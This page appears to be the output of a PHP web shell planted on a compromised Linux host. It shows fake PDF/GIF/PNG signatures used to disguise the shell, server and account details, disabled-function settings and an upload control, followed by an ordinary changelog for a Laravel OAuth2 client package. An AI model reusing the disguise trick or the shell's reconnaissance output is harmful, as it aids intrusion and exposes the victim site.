%PDF- %GIF98; %PNG;
Server : ApacheSystem : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64 User : addictionfreeind ( 1003) PHP Version : 7.2.34 Disable Function : exec,passthru,shell_exec,system Directory : /home/addictionfreeind/public_html/admin1/vendor/macsidigital/laravel-oauth2-client/ |
Upload File : |
# Changelog All notable changes to `laravel-oauth2-client` will be documented in this file ## 2.0.1 - 2022-09-15 In some cases the token check and API call can run over 1 second apart which can cause issues if the token check is at the token expiry time, as the API call fails due to an expired token. This fixes the issue by renewing the token if there is less than 1 minute of expiry on the token. ## 2.0.0 - 2022-03-31 Support PHP8.1 and Laravel 9 ## 1.1.0 - 2020-09-08 - Initial Release with Laravel 8.0 ## 1.0.0 - 2020-05-10 - New OAuth2 Client Authenticaiton Library Alpha